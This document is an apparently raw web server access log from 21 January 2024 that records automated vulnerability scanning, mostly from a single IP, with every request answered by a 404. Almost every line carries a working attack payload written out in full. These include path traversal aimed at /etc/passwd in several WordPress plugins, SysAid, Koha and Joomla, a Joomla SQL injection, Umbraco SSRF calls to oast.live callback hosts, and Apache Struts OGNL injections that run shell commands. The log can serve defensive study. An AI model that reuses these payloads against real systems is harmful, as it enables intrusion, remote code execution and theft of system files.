137.220.197.141 - - [21/Jan/2024:00:00:50 +0100] "POST /website/blog/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:00:52 +0100] "POST /_search HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:00:56 +0100] "GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:00:58 +0100] "GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:01:17 +0100] "POST /website/blog/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:01:19 +0100] "POST /_search HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:02:08 +0100] "GET /wp-admin/tools.php?content=attachment&wp-attachment-export-download=true HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:02:10 +0100] "GET /wp-admin/tools.php?content&wp-attachment-export-download=true HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:02:29 +0100] "GET /wp-admin/tools.php?content=attachment&wp-attachment-export-download=true HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:02:31 +0100] "GET /wp-admin/tools.php?content&wp-attachment-export-download=true HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:02:57 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:04:33 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:04:44 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:04:56 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:05:14 +0100] "GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:05:16 +0100] "GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:05:27 +0100] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:05:29 +0100] "GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:05:42 +0100] "GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:05:44 +0100] "GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:07:12 +0100] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:07:14 +0100] "GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:08:03 +0100] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:08:05 +0100] "GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:08:34 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:09:24 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:09:47 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:10:07 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
83.97.73.245 - - [21/Jan/2024:00:11:44 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:11:45 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:11:55 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:12:08 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:13:15 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:13:58 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:14:51 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:15:01 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:15:06 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:15:13 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:15:47 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:16:06 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:16:19 +0100] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:16:24 +0100] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:16:26 +0100] "GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:16:39 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:16:39 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:16:51 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:17:04 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:17:05 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:18:48 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:18 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:20 +0100] "GET /cgi-bin/status HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:22 +0100] "GET /cgi-bin/stats HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:24 +0100] "GET /cgi-bin/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:26 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:28 +0100] "GET /test.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:30 +0100] "GET /debug.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:32 +0100] "GET /cgi-bin/test-cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:19:41 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:20:05 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:20:43 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:20:45 +0100] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:20:45 +0100] "GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:20:57 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:21:12 +0100] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:21:14 +0100] "GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:21:22 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:21:35 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:22:01 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:22:16 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:22:35 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:22:46 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:22:59 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:23:29 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:23:32 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:23:34 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:23:36 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:23:44 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:23:50 +0100] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:23:55 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:24:16 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:24:54 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:25:04 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:25:05 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:25:15 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:25:16 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:25:22 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsogabopchw9yxdnc.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:25:28 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:20 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:23 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:25 +0100] "GET /cgi-bin/status HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:27 +0100] "GET /cgi-bin/stats HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:29 +0100] "GET /cgi-bin/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:31 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:31 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:33 +0100] "GET /test.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:35 +0100] "GET /debug.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:35 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:37 +0100] "GET /cgi-bin/test-cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:45 +0100] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:49 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsog68gak7arxqdtk.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:59 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsog7txm3zxo5m3fp.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:26:59 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:27:11 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsogrn5xtuszc68zi.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:27:35 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:27:49 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:28:02 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:28:07 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:28:12 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:28:27 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:28:41 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:28:55 +0100] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:12 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:17 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:32 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:40 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:43 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:52 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:54 +0100] "GET /cgi-bin/status HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:55 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:55 +0100] "GET /cgi-bin/stats HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:29:58 +0100] "GET /cgi-bin/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:30:00 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:30:02 +0100] "GET /test.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:30:04 +0100] "GET /debug.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:30:06 +0100] "GET /cgi-bin/test-cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:30:09 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:30:19 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsog1ejy5zyynwtup.oast.live HTTP/1.1" 404 952
83.97.73.245 - - [21/Jan/2024:00:30:35 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:30:35 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:31:08 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsogo6mb9ssqfnujc.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:31:31 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsogd3pk1weu8k7gr.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:31:56 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:32:01 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:32:34 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:32:45 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:33:03 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:33:23 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:33:34 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:33:34 +0100] "GET /system/console?.css HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:00:33:34 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:33:43 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:33:46 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:33:53 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:34:06 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:34:16 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:34:19 +0100] "POST /cgibin/webproc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:34:56 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:00 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:04 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:10 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:11 +0100] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:17 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:20 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsogd64kc9j5zhj9x.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:20 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:22 +0100] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:24 +0100] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:26 +0100] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:28 +0100] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:30 +0100] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
